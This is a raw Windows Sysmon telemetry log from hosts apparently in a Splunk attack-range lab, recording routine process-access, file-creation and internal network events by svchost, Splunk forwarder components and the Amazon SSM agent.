10:46:51.522{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215998Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:51.522{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215997Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:51.522{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215996Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:51.522{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215995Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:51.522{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000215994Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:51.522{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-109B-6216-4104-000000003902}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000215993Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:51.522{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-109B-6216-4104-000000003902}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000215992Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:51.523{4F8D34B0-109B-6216-4104-000000003902}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:52.764{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C588BCD50F807F3CD929C36294DC2E9,SHA256=D9106F6E52913D3A28F4F9E7B5EF99D0FD72D81A596866E616F4B9B5AC191EC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216007Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:52.533{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6838B8EBCBE3E3B691721B0DE2183C1C,SHA256=275A0D13E8B76F34AC63947C1AE759D3AD77967C57022C6940E0565AB881B99E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216006Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:52.167{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-130MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216005Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:52.009{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C113B495DB8FD346BD3C9EC1BAF31CA,SHA256=655CB15873760E04422A8D9CBB71A412BC1204399C1D44ECC2666F6CBD73C905,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:53.779{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=934330FE3C76BBB2C4A0CBB2836290EC,SHA256=12F4FD14969F59BF4237C630F96EC0BD5F1ACF279A8DA9C16AB8779626225C69,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216010Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:50.649{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51293-false10.0.1.12-8000- 23542300x8000000000000000216009Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:53.177{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAA2CAD772B4DF84AC9B7AA6D79456E1,SHA256=058A481585D0D6ED7CAEB16F8C9307BF4ECC7AE87F8D7748DA668B3BAA71DA3C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:51.612{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53380-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000216008Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:53.175{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-131MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:54.795{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD3531D45AC4218739B76B3985774B7A,SHA256=9445A5337418B2600B5C08E8BB65F8E4763B1375F202194E3FCBDC9319931917,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216011Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:54.179{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E68D60485CC49445024D54A984EDF34,SHA256=39A03D9EB968EC126C83BF95C48992DD6CE875110B4E75BB16946912BAF05FD8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:55.826{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70164DBB939C4923DCE8CB195778DFC3,SHA256=5168C1F12319D3F94FA196A0B9AD6887CBE505BE418B01A1A7BE6F575909902D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216012Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:55.210{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5497E255CA2875D4C97879668AB37219,SHA256=CDDB09AC04FFFECD090E6D3180755273C293B1FFCDE8A59B2ADF4506335B9A2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:56.857{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9B1DBE6E5FC69053DAE4E5174666159,SHA256=50A4CB4966717FD71A204FFBF6DA8D0842BAC1A82413924458A3A633927F04A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216013Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:56.257{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54B7FA5C42C9A6902F25FED0B94E135B,SHA256=C5D651E6E83EB3DEA3B4D1BEB9DCF0E0FD2F75CE13D9E7D1A63C4392D0F3C8A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:57.873{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F7344330FE1949468E8C61FD3591F8B,SHA256=A953C9E2B5613E31210B88AE4EFDF0E64B1577EF5D290BEC8999D34EFF03CB23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216014Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:57.273{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91A71B0FDC7C64FF0209C3ADE2EE0E0C,SHA256=A642D5A4DEA943B3EC387776C2799CEF95AA42A977EF3494379B3E97D6338B1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216015Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:58.320{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78F6BECB157A6E201CE4A33FA47BA8A4,SHA256=28C239451C26585D43726F4A347BA4E7A0920EC9E1EBDE519D7829BEF94A7051,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216017Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:56.634{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51294-false10.0.1.12-8000- 23542300x8000000000000000216016Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:59.335{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AACBEFD18A281663E6096FC57BE65855,SHA256=5742400E96E9F7CDF58D54C5B690A9FEAD23B2A9E6950F2AE7D80D194E6EF402,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000287053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:57.612{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53381-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000287052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:58.998{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66D686354027C3786C0A67215EC4DF5D,SHA256=881AF6BD68EACA9B7FEE1028784E218C942A550B87249A0EDBC244E6AD49B2D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216018Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:00.554{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8D66E62F9FE1FEC375B8ECB8E11A1C7,SHA256=9E4ABB6DDEC5DA0B3B8475A6E8914F855BCDCB1ECAF069DF71A6ADFC3DF2F3AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000287054Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:00.029{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC685D0A0FD7083432F5311534F6F06B,SHA256=30F749CAC8B267CCE5EFF57E3CD1BD4F2EC632B94569B92623D2E58326E09726,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216019Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:47:01.788{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=497C5B9F55BE7C4B106CC01174C5EB6C,SHA256=E6EAF9D74371DF6DEF69ECC6B8DB8505B591BE2253B4C09B54293AC35136FC84,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:01.982{C8EA50B7-10A5-6216-F004-000000003802}3005272C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:01.717{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-10A5-6216-F004-000000003802}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:01.717{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:01.717{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:47:01.717{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 